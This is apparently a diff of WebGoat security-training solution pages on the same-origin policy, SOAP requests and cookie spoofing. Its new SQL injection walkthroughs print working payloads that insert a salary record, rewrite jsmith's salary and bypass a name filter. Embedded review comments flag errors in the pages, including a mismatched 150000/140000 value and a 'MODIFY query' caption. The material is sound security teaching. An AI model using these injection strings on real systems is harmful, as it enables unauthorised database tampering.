UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:"MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-alt:"\FF2D\FF33 \660E\671D";
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;
mso-font-charset:0;
mso-generic-font-family:roman;
mso-font-pitch:variable;
mso-font-signature:-1610611985 1107304683 0 0 159 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
@font-face
{font-family:"\@MS Mincho";
panose-1:2 2 6 9 4 2 5 8 3 4;
mso-font-charset:128;
mso-generic-font-family:modern;
mso-font-pitch:fixed;
mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-parent:"";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
h1
{mso-style-unhide:no;
mso-style-qformat:yes;
mso-style-link:"Heading 1 Char";
mso-style-next:Normal;
margin-top:12.0pt;
margin-right:0cm;
margin-bottom:3.0pt;
margin-left:0cm;
mso-pagination:widow-orphan;
page-break-after:avoid;
mso-outline-level:1;
font-size:16.0pt;
font-family:"Arial","sans-serif";
mso-fareast-font-family:"MS Mincho";
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
h2
{mso-style-noshow:yes;
mso-style-priority:9;
mso-style-qformat:yes;
mso-style-link:"Heading 2 Char";
mso-style-next:Normal;
margin-top:10.0pt;
margin-right:0cm;
margin-bottom:0cm;
margin-left:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan lines-together;
page-break-after:avoid;
mso-outline-level:2;
font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
p.MsoCaption, li.MsoCaption, div.MsoCaption
{mso-style-noshow:yes;
mso-style-qformat:yes;
mso-style-next:Normal;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
font-weight:bold;}
p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
{mso-style-noshow:yes;
mso-style-priority:99;
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;}
a:link, span.MsoHyperlink
{mso-style-noshow:yes;
color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-noshow:yes;
mso-style-priority:99;
color:purple;
mso-themecolor:followedhyperlink;
text-decoration:underline;
text-underline:single;}
p
{mso-style-noshow:yes;
mso-margin-top-alt:auto;
margin-right:0cm;
mso-margin-bottom-alt:auto;
margin-left:0cm;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:"Times New Roman","serif";
mso-fareast-font-family:"Times New Roman";}
pre
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"HTML Preformatted Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
font-size:10.0pt;
font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
mso-style-priority:99;
mso-style-link:"Balloon Text Char";
margin:0cm;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-fareast-font-family:"Times New Roman";}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:16.0pt;
mso-bidi-font-size:16.0pt;
font-family:"MS Mincho";
mso-ascii-font-family:"MS Mincho";
mso-fareast-font-family:"MS Mincho";
mso-hansi-font-family:"MS Mincho";
mso-bidi-font-family:Arial;
mso-font-kerning:16.0pt;
mso-fareast-language:JA;
font-weight:bold;}
span.Heading2Char
{mso-style-name:"Heading 2 Char";
mso-style-noshow:yes;
mso-style-priority:9;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Heading 2";
mso-ansi-font-size:13.0pt;
mso-bidi-font-size:13.0pt;
font-family:"Cambria","serif";
mso-ascii-font-family:Cambria;
mso-ascii-theme-font:major-latin;
mso-fareast-font-family:"Times New Roman";
mso-fareast-theme-font:major-fareast;
mso-hansi-font-family:Cambria;
mso-hansi-theme-font:major-latin;
color:#4F81BD;
mso-themecolor:accent1;
font-weight:bold;}
span.HTMLPreformattedChar
{mso-style-name:"HTML Preformatted Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"HTML Preformatted";
font-family:"Courier New";
mso-ascii-font-family:"Courier New";
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
span.BalloonTextChar
{mso-style-name:"Balloon Text Char";
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-unhide:no;
mso-style-locked:yes;
mso-style-link:"Balloon Text";
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:"Tahoma","sans-serif";
mso-ascii-font-family:Tahoma;
mso-fareast-font-family:"Times New Roman";
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
.MsoChpDefault
{mso-style-type:export-only;
mso-default-props:yes;
font-size:10.0pt;
mso-ansi-font-size:10.0pt;
mso-bidi-font-size:10.0pt;
mso-ascii-font-family:Arial;
mso-fareast-font-family:Calibri;
mso-fareast-theme-font:minor-latin;
mso-hansi-font-family:Arial;
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
@page Section1
{size:595.3pt 841.9pt;
margin:70.55pt 56.9pt 70.55pt 56.9pt;
mso-header-margin:35.3pt;
mso-footer-margin:35.3pt;
mso-title-page:yes;
mso-paper-source:0;}
div.Section1
{page:Section1;}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Arial","sans-serif";
mso-bidi-font-family:"Times New Roman";
mso-bidi-theme-font:major-bidi;}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="4098"/>
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout></xml><![endif]-->
</head>
<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
<div class=Section1>
<p class=MsoNormal><b>Lesson
Plan Title:</b><span style='font-family:"Arial","sans-serif"'> Same Origin Policy Protection. <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous calls from the client side to a server. However, as a security measure these requests may only be made to the server from which the client page originated. <o:p></o:p></span></p>
<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>This exercise demonstrates the Same Origin Policy Protection. XHR requests can only be passed back to the originating server. Attempts to pass data to a non-originating server will fail.<br style='mso-special-character:line-break'>
<![if !supportLineBreakNewLine]>
<![endif]><o:p></o:p></span></p>
<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b>
<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Click both of the links on the page to see their behavior and complete the lesson. <o:p></o:p></span></p>
<b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;&nbsp;</o:p></span></b>
<p class=MsoNormal><o:p>&nbsp;</o:p></p>
</div>
</body>
</html>

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Silent Transcations Attacks</title>
<link rel=File-List href="lesson_solutions/SilentTransactions_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SilentTransactions_files/editdata.mso">
<!--[if !mso]>
@ -693,7 +694,6 @@ transferring money. Examining the HTML source reveals that two JavaScript
functions are being used:<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;script&gt;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>function
@ -839,7 +839,6 @@ style='mso-tab-count:4'>
style='mso-spacerun:yes'>        </span>}}}<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>&lt;/script&gt;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The function

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Create a SOAP Request</title>
<link rel=File-List href="lesson_solutions/SoapRequest_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SoapRequest_files/editdata.mso">
<!--[if !mso]>
@ -775,30 +776,20 @@ HTTP Request with WebScarab and click on the
<ol style='margin-top:0cm' start=1 type=1>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Change the POST header to open
the SoapRequest. <o:p></o:p></span></li>
the SoapRequest: <br/>
POST http://localhost/webgoat/services/SoapRequest HTTP/1.1 <b>(This will vary based on which ports you are using)</b><o:p></o:p></span></li>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Change the Content-Type to
text/xml. <o:p></o:p></span></li>
text/xml:<br/>
Content-Type: text/xml <o:p></o:p></span></li>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Add a header SOAPAction. <o:p></o:p></span></li>
style='font-family:"Arial","sans-serif"'>Add a header SOAPAction.<br/>
SOAPAction: <b>(No value needs to be specified for this header)</b> <o:p></o:p></span></li>
<li class=MsoNormal style='mso-list:l0 level1 lfo3;tab-stops:list 36.0pt'><span
style='font-family:"Arial","sans-serif"'>Append the XML envelope to the
request<o:p></o:p></span></li>
request:<o:p></o:p></span></li>
</ol>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>POST
http://neo:80services/SoapRequest HTTP/1.1<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>Content-Type:
text/xml<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>SOAPAction:
<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;?xml
version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; <o:p></o:p></span></p>
@ -834,6 +825,20 @@ style='mso-spacerun:yes'>
<p class=MsoNormal style='margin-left:36.0pt'><span style='font-family:"Arial","sans-serif"'>&lt;/SOAP-ENV:Envelope&gt;<o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p><br/>It is important that there is no whitespace (carriage returns or spaces) from the SOAPAction header to the opening XML tag. This generates an error instead of the desired response.</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
"Arial","sans-serif";mso-no-proof:yes'><img
src="lesson_solutions/SoapRequest_files/image011.jpg"></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Updated HTTP request with SOAP parameters<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The response
@ -850,7 +855,7 @@ src="lesson_solutions/SoapRequest_files/image010.jpg" v:shapes="Picture_x0020_17
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
<span style='mso-element:field-separator'></span><![endif]--><span
style='mso-no-proof:yes'>5</span><!--[if supportFields]><span style='mso-element:
style='mso-no-proof:yes'>6</span><!--[if supportFields]><span style='mso-element:
field-end'></span><![endif]--> Intercept response<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

@ -0,0 +1,43 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Modify Data with SQL</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Add Data with SQL</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to add a record to the table.
</p>
<b>Solution:</b><br/><br/>
In this lesson, we will use the INSERT query, which uses the format:<br/>
<b>INSERT INTO table VALUES (value1, value2);</b><br/><br/>
In this case, the salaries table has two relevant columns: column 1 is userid, and column 2 is salary.
We will use the command:<br/>
<b>INSERT INTO salaries VALUES ('rlupin',140000);</b> <br/><br/>
This, however, will not work correctly. We are inserting this in between two single quotes in the command:<br/>
SELECT * FROM salaries WHERE userid='<b><font color="blue">userid</font></b>';<br/><br/>
If we treated this lesson as we have treated the previous one, our command would look like this:<br/>
SELECT * FROM salaries WHERE userid='<b><font color="blue">whatever'; INSERT INTO salaries VALUES ('rlupin',150000);</font></b>'<br/><br/>
The statement cannot end with a single quote after the semicolon, so we must comment out the quote using <b>--</b>.<br/>
To complete this lesson, type the following into the field and press go:<br/>
<b>whatever'; INSERT INTO salaries VALUES ('rlupin',140000);--</b><br/><br/>
If you then search for the userid rlupin, you will see there is new record.<br/><br/>
<img src="lesson_solutions/SqlAddData_files/image001.jpg"><br/>
<font size="2"><b>New employee record after using an INSERT query.</b></font><br/><br/><br/>
</body>
</html>
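Review bot: The worked example is internally inconsistent: the illustrative injected statement shows `INSERT INTO salaries VALUES ('rlupin',150000);` while the preceding INSERT and the final payload use `140000`, so a learner comparing the two will not know which one produces the screenshot; use `whatever'; INSERT INTO salaries VALUES ('rlupin',140000);--` consistently. The `<title>` reads "Solution: Modify Data with SQL" although the Lesson Plan Title on the page is "Add Data with SQL", so the browser tab mislabels this solution; change it to `<title>Solution: Add Data with SQL</title>`. The Concept section presents sanitizing input as the remedy; for a lesson whose point is injection, it would be more accurate to state that the primary defence is parameterized queries (PreparedStatement with bound parameters) and that input validation is defence in depth, since string concatenation into the query is the root cause the exercise demonstrates. Minor: "data that will used" should read "data that will be used".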

@ -0,0 +1,39 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Solution: Modify Data with SQL</title>
<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
</head>
<body>
<p><b>Lesson Plan Title:</b> Modify Data with SQL</p>
<p><b>Concept / Topic To Teach:</b><br/>
SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
<br><br>
Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
<br>
It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.<br>
<br>
</p>
<p><b>General Goal(s):</b><br/>
The form below allows a user to view salaries associated with a userid (from the table named salaries). This form is vulnerable to String SQL Injection. In order to pass this lesson, use SQL Injection to modify the salary for userid jsmith.
</p>
<b>Solution:</b><br/><br/>
In this lesson, instead of using the SELECT query command, we use the UPDATE command, which uses the format:<br/>
<b>UPDATE table SET column=value WHERE column=value;</b><br/><br/>
We need to update the table <b>salaries</b>, setting the <b>salary</b> column to a new number.<br/>
We will use the command:<br/>
<b>UPDATE salaries SET salary=999999 WHERE userid='jsmith'</b> <br/><br/>
We also need to end the previous query and leave our last quote open to make a valid statment.<br/>
To complete this lesson, type the following into the field and press go:<br/>
<b>whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith</b><br/><br/>
If you then search for the userid jsmith, you will see the salary has been updated.<br/><br/>
<img src="lesson_solutions/SqlModifyData_files/image001.jpg"><br/>
<font size="2"><b>Updated salary after using a MODIFY query.</b></font><br/><br/><br/>
</body>
</html>
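Review bot: The figure caption says "Updated salary after using a MODIFY query", but SQL has no MODIFY statement and the walkthrough itself uses UPDATE; change it to `Updated salary after using an UPDATE query.` The payload `whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith` only works because the application appends the closing quote, yet unlike the companion Add Data solution this page never shows the vulnerable query shape, so the sentence about leaving "our last quote open" has nothing to refer to; consider adding the resulting full statement, e.g. `SELECT * FROM salaries WHERE userid='whatever'; UPDATE salaries SET salary=999999 WHERE userid='jsmith'`, so the reader sees why the trailing quote is omitted. "statment" should be "statement". As in the Add Data solution, the Concept section would be stronger if it named parameterized queries as the primary defence rather than input sanitization alone.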

@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: SQL String Injection</title>
<link rel=File-List href="lesson_solutions/SqlStringInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/SqlStringInjection_files/editdata.mso">
<!--[if !mso]>
@ -671,7 +672,7 @@ used in this lesson is: SELECT * FROM user_data WHERE last_name = 'Your Name'<o:
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Enter for the
last name value: Erwin' OR '1'='1 <o:p></o:p></span></p>
last name value: <b>Erwin' OR '1'='1</b> <o:p></o:p></span></p>
<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>

@ -10,6 +10,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<title>Solution: Spoof an Authentication Cookie</title>
<link rel=File-List href="lesson_solutions/WeakAuthenticationCookie_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakAuthenticationCookie_files/editdata.mso">
<!--[if !mso]>

@ -1,888 +1,90 @@
<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns="http://www.w3.org/TR/REC-html40">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="lesson_solutions/WeakSessionID_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/WeakSessionID_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]--><!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>egeirnaert</o:Author>
<o:LastAuthor>egeirnaert</o:LastAuthor>
<o:Revision>3</o:Revision>
<o:TotalTime>27</o:TotalTime>
<o:Created>2007-07-11T10:54:00Z</o:Created>
<o:LastSaved>2007-07-12T15:30:00Z</o:LastSaved>
<o:Pages>3</o:Pages>
<o:Words>469</o:Words>
<o:Characters>2677</o:Characters>
<o:Company> </o:Company>
<o:Lines>22</o:Lines>
<o:Paragraphs>6</o:Paragraphs>
<o:CharactersWithSpaces>3140</o:CharactersWithSpaces>
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="lesson_solutions/WeakSessionID_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/WeakSessionID_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
</w:Compatibility>
<w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
